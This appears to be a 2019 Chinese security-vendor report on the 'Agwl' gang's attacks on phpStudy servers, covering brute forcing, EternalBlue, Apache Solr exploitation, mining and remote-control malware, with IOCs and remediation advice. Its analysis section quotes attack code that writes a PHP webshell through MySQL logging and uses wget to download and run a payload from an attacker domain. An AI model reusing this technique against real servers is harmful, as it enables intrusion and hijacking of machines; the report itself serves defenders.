Agwl团伙再攻Phpstudy,新增Apache Solr漏洞利用

2019-09-24 15:46:25
御见威胁情报中心检测到“Agwl”团伙针对phpStudy网站服务器再度发起攻击,此次攻击“升级”后,被入侵服务器会下载释放“永恒之蓝”漏洞攻击、SQL爆破攻击、Apache Solr 8月公布的最新漏洞攻击模块,并使用这些攻击模块进一步扩散传播当前病毒的核心程序。

一、背景

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成ApachePHPMySQLphpMyAdminZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。

2019920日,在杭州西湖区公安分局网警大队通报的打击涉网违法犯罪暨“净网2019”专项行动战果中,公布了破获的一起在PhpStudy中植入后门的案例。通报内容指出,犯罪嫌疑人使用黑客手段非法侵入PhpStudy软件官网,篡改软件安装包内容并植入后门,并利用该手段共非法控制计算机67万余台,非法获取账号密码类、聊天数据类、设备码类等数据10万余组。最后,利用盗取的账号密码,入侵修改服务器数据实施诈骗,非法牟利共计600余万元。详细内容参考:https://mp.weixin.qq.com/s/s-5cVTxIJcDfdRjtnEnI0g

这是一起严重的供应链攻击事件,通过入侵开发组件供应网站并对公开下载的程序集成包进行污染,不法分子”悄无声息“地将后门植入到大量开发者的电脑中。

与供应链攻击事件的偶发性不同,PhpStudy弱口令爆破攻击事件则呈现持续高发态势。腾讯安全御见威胁情报中心在20187月发现针对phpMyadmin后台管理登录页面爆破登录,植入远控和挖矿木马的事件。

https://www.freebuf.com/column/178753.html

20191月又发现“Agwl”团伙针对phpStudy网站服务器的批量入侵行动。

https://www.freebuf.com/column/195035.html

20198月腾讯安全御见威胁情报中心监测到“Agwl”团伙在最新的入侵行动将Linux系统纳入攻击范围。

https://www.freebuf.com/column/210631.html

近日,御见威胁情报中心检测到“Agwl”团伙针对phpStudy网站服务器再度发起攻击,此次攻击“升级”后,被入侵服务器会下载释放永恒之蓝漏洞攻击、SQL爆破攻击、Apache Solr 8月公布的最新漏洞攻击模块,并使用这些攻击模块进一步扩散传播当前病毒的核心程序。

此次受“Agwl”团伙攻击影响超过一万台服务器,影响严重地区分别北京、广东和浙江。受害地区分布如下:

Agwl”团伙攻击影响范围分布图

二、详细分析

开始攻击时,黑客首先针对web服务相关端口进行扫描,发现开放端口的IP后,利用路径特征探测目标IP是否采用phpMyAdmin系统,如果发现存在,则使用弱口令尝试进行爆破登录。

爆破攻击成功则通过cmd_shell下载植入木马http[:]//down.us-hack.ru/wk.exewk.exe会继续下载挖矿木马及远控木马,同时下载SQL爆破、永恒之蓝漏洞利用、Apache Solr漏洞(CVE-2019-0193)利用三种攻击方式进一步扩散传播病毒。

“Agwl”针对PhpStudy攻击流程

2.1 前期准备

我们从服务器下载得到压缩包文件Python36.zip,解压释放得到phpstudy_python3.pyphpstudy_python3.py是一个Python脚本文件,作为探测攻击核心脚本,落地后在木马释放的Python程序环境下运行。

从脚本开头定义了变量 “C:\\AppServ\\MySQL\\”“linuxphpstudy”等,为同时针对Windows系统和Linux系统攻击作准备。 


开始探测前,首先先通过扫描工具Masscan(文件名为0893.exe)扫描80818288808080818082端口,扫描范围为全网IP(1.0.0.0~223.255.255.255),并将开放端口的IP保存至open.txt,随后执行bpsa.bat加载探测程序。


Bpsa.bat加载python探测脚本phpstudy_python3.py针对扫描到开放端口的IP进行探测,探测成功则执行shell,根据攻击过程中的计数参数,探测攻击9999次之后暂停。


2.2 探测入侵

开始探测时phpstudy_python3.py开启多个工作线程。首先通过匹配路径url + "/phpmyadmin"来发现是否存在phpmyadmin


发现phpmyadmin后,请求路径url+"/pmd"尝试获取登录页面,若成功获取到登录页面,则进入bppass()中进行弱口令爆破。


爆破使用的弱口令密码保存在password.txt文件中,打开该文件可以看到,目前用来爆破的弱口令高达3000多个


爆破成功后,进入get_shell()中,将一段sql命令传给shell执行,该SQL命令最终通过wget.exe下载木马wk.exe并启动。

path = path + "wk.php"

wget = '''http://down.us-hack.ru/wget.exe'''

xz = str(base64.b64encode(wget.encode('utf-8')),'utf-8')

wk = '''wget.exe http://down.us-hack.ru/wk.exe &wk.exe'''

xz1 = str(base64.b64encode(wk.encode('utf-8')),'utf-8')

hm = '''wget.exe http://14.29.194.121:22/angge.php'''

xz2 = str(base64.b64encode(hm.encode('utf-8')),'utf-8')

wjm = '''"wget.exe", "w"'''

sql = ["set global general_log='on';","SET global general_log_file='"+path+"';","SELECT '<?php $wk = fopen("+wjm+");$sj =file_get_contents(base64_decode('"+xz+"')) ;fwrite($wk, $sj);fclose($wk);sleep(3);@system(base64_decode('"+xz1+"'));@system(base64_decode('"+xz2+"'));phpinfo();?>';"]


2.3 扩散传播

2.3.1 SQL弱口令爆破

在入侵成功后续阶段,通过SQL爆破程序CSQL.exe进行端口扫描爆破(1433/2433/3433),扫描范围为全网段IP


爆破成功后通过xp_

cmdshell下载http[:]//down.us-hack.ru/wk.exe植入。


2.3.2 “永恒之蓝”漏洞攻击

扫描全网段IP445端口,针对开放端口的IP,利用NSA武器中的永恒之蓝双脉冲星永恒浪漫进行漏洞利用攻击。


漏洞攻击成功后执行x86/x64.dll下载下载http[:]//down.us-hack.ru/wk.exe植入。


2.3.3 Apache Solr漏洞攻击

201981日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。

漏洞出现在Apache SolrDataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。

攻击时先扫描端口(全网段IP),然后将开放Solr默认端口8983IP保存,并利用得到的IP列表构造攻击时需要的URLhttp://IP:8983保存至ips.txt


扫描到开放8983端口的IP地址后,利用CVE-2019-0193 (Python攻击代码打包为ll.exe)对每个IP进行攻击。(漏洞攻击代码githubhttps://github.com/jas502n/CVE-2019-0193/blob/master/CVE-2019-0193.py


攻击成功后植入http[:]//down.us-hack.ru/wk.exe


2.4 挖矿木马

入侵成功后下载挖矿木马母体hxxp://down.halloo.ru/udefrag.zip,解压后释放到C:\Windows\Fonts\debug\目录下。

Udefrag.exe是百度拼音的正常子程序,在运行时会自动加载同目录下的configure.dll(由木马替换而来)执行,病毒使用正规文件进行+启动,试图绕过杀软检测。


configure.dll被加载执行后首先删除旧的挖矿文件C:\Windows\System\debug\svchost.exe,然后下载挖矿文件压缩包xmr.zip并利用下载的解压程序unzip.exe进行解压释放到C:\Windows\System\debug\目录。


最后启动挖矿进程,矿机程序采用开源挖矿程序XMRSTAK编译。矿池地址为:pool.us-hack.ru:3333,钱包地址:

A9RvGu2BG6S6NNo13YyU1TgcDFP7NXFUDZ84RGgE5N3X16WSD5S9ockNpfvnmLpjf326SReabxtwuAMSwgsQwwpLDCbqi1Zbase64解码后)



2.5远控木马

在攻击最后阶段会下载http[:]//down.us-hack.ru/agwl.exeagwl.exe下载大灰狼远控木马http[:]//dash.us-hack.ru/NetSyst96.dll加载到内存执行。


三、安全建议

1、 服务器关闭不必要的高危端口,如139/445/1433等;

2、 加固服务器,修补服务器安全漏洞,及时修复永恒之蓝”系列漏洞;Apache Solr CVE-2019-0193漏洞修复建议将Apache Solr升级至8.2.0或之后的版本

3、 对于phpStudy一类的集成环境,在安装结束后应及时修改phpmyadmin 密码、MySQL密码为高强度密码,避免被黑客探测入侵。

4、如有发现感染“Agwl”挖矿病毒,可按照以下方法手动清理:

删除目录

C:\Windows\Fonts\Python36\

删除文件

C:\Windows\Fonts\debug\Udefrag.exe

C:\Windows\Fonts\debug\Configure.dll

C:\Windows\System\debug\svchost.exe

C:\Windows\System32\wk.exe

C:\ProgramData\wk.exe

C:\xp.exe

5、网站管理员可使用腾讯云网站管家智能防护平台(网址:https://s.tencent.com/product/wzgj/index.html),该系统具备Web入侵防护,0Day漏洞补丁修复等多纬度防御策略,可全面保护网站系统安全。

6、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。


IOCs

IP

103.13.221.20

14.29.194.121

Domain

down.us-hack.ru

down2.us-hack.ru

down.halloo.ru

dash.us-hack.ru

URL

hxxp://down.halloo.ru/Alloy.zip

hxxp://down.halloo.ru/udefrag.zip

hxxp://down.halloo.ru/zx.exe

hxxp://down.halloo.ru/Python36.zip

hxxp://down.halloo.ru/authman.zip

hxxp://down.us-hack.ru/update.exe

hxxp://down.us-hack.ru/vc_redist.x64.exe

hxxp://down.us-hack.ru/wk.exe

hxxp://down.us-hack.ru/xmr.zip

hxxp://down.us-hack.ru/udefrag.zip

hxxp://down.us-hack.ru/agwl.exe

hxxp://down.us-hack.ru/authman.zip

hxxp://down.us-hack.ru/Python36.zip

hxxp://down.us-hack.ru/unzip.exe

hxxp://dash.us-hack.ru/NetSyst96.dll

hxxp://14.29.194.121:22/angge.php

MD5

a11eb542f7afda5d8488efda4cdf28ee

89d422febf1eba1a7fe0fabb39544d69

2a516ca66cafd6e1e64ee4620503abaa

a74f591e5b09adaae4d37fae16e65405

9579ec1a5388ba40b585103ac065e04d

3418ebb7ea2e04484504d6cb34a2f51e

44d14a9a862278d416f27740b3488c26

ea22ed41cec42e73ad341b82959ff86c

047a53b43f10c50c651bdea7a3842150

3ccc45a219dfc96d0062a58eb29384b9

钱包地址:

A9RvGu2BG6S6NNo13YyU1TgcDFP7NXFUDZ84RGgE5N3X16WSD5S9ockNpfvnmLpjf326SReabxtwuAMSwgsQwwpLDCbqi1Z

参考链接:

https://www.freebuf.com/column/178753.html

https://www.freebuf.com/column/195035.html

https://www.freebuf.com/column/210631.html

https://issues.apache.org/jira/browse/SOLR-13669

最新资讯